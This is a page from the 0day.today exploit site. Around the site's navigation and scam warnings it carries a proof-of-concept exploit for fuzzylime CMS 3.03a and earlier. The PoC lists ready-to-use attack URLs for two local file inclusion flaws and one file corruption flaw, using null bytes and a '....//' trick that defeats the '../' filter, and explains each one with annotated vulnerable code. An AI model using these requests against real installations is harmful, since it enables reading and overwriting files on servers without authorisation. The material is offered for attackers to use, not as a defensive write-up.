0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC
====================================================================== fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC ====================================================================== +------------------------------------------------------------------------+ | fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc | +-----------+------------------------------------------------------------+ | by staker | +-----------+---------------------+ | url: http://cms.fuzzylime.co.uk | +---------------------------------+ [1][LFI] http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte } Vulnerable code: confirm.php (local file inclusion mq=off) ----------------------------------------------------------------- 1. <? 2. @extract($HTTP_GET_VARS); <-------- {1} 3. @extract($_GET); <----------^ 27. elseif(isset($e)) { <------- {2} 28. $filename = "code/mailing/$list.inc.php"; <------- {3} 29. @include $filename; <------- {4} ----------------------------------------------------------------- 1. extract() allows to overwrite any not-defined variable via get therefore it works regardless of register_globals settings. 2. $e is a variable not defined,therefore become $_GET['e'] 3. $list is a variable not defined,therefore become $_GET['list'] 4. $filename contains $list variable that will be required ----------------------------------------------------------------- [2][LFI] http://[target]/[path]/code/display.php?template= {file + nullbyte} Vulnerable code: display.php (local file inclusion mq=0 & reg=on) -------------------------------------------------------------------- 98. if($_GET['print'] != "1") include "templates/${template}_f.php"; -------------------------------------------------------------------- [3][LFC] http://[target]/[path]/code/display.php?usecache=1&s=....//settings http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off) Vulnerable code: display.php (local file corruption register_gl=1) ----------------------------------------------------------------- 1. <? 2. $s = $_GET[s]; 3. $p = $_GET[p]; 4. $s = str_replace("../", "", $s); <---------- {1} 5. $p = str_replace("../", "", $p); ... 54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2} 100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3} 101. if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4} 102. $output = ob_get_contents(); 103. fputs($handle, $output); 104. 105. fclose($handle); 106. } 107. } ---------------------------------------------------------------------- 1. you have to use ....// to change directory because of 1st point. so ....// will be ../ 2. $cachefile contains $s variable 3. if $usecache == 1 we will go ahead 4. you will overwrite a file typing the name via $s variable. ----------------------------------------------------------------------- # 0day.today [2024-07-02] #